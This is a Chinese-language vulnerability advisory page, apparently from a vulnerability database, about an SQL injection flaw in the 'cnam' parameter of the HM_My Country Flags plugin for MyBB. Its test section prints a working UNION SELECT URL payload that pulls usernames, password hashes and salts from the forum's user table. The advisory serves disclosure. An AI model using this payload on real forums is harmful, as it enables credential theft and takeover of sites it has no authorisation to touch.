MyBB HM_My Country Flags插件’cnam’ SQL注入漏洞

日期: 2012/12/30 | 标签:mybb | 游览：283

漏洞起因
SQL注入错误
危险等级
中

影响系统
HM_My Country Flags 1.x (plugin for MyBB)

不受影响系统

危害
远程攻击者可以利用漏洞可获得数据库信息或控制应用系统。

攻击所需条件
攻击者必须访问MyBB HM_My Country Flags插件。

漏洞信息
MyBB是一款流行的PHP论坛程序。
MyBB HM_My Country Flags插件misc.php脚本不正确过滤”cnam”参数数据，允许攻击者利用漏洞进行SQL注入攻击，可获得数据库信息或控制应用系统。

测试方法
http://www.example.com/forum/misc.php?action=hmflags&cnam=Belgium’&pf=5
http://www.example.com/forum/misc.php?action=hmflags&cnam=-Belgium’+UNION SELECT 1,group_concat(username,0x3a,password,0x3a,salt,0x3b),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164+FROM+mybb_users WHERE uid=1–+&pf=5

厂商解决方案
目前没有详细解决方案提供：
http://www.mybb.com/

漏洞提供者
JoinSe7en

← Linux内核hypervkvpd拒绝服务漏洞

NVidia显示驱动服务(nvvsvc.exe)命名管道缓冲区溢出漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

MyBB HM_My Country Flags插件’cnam’ SQL注入漏洞

评论关闭。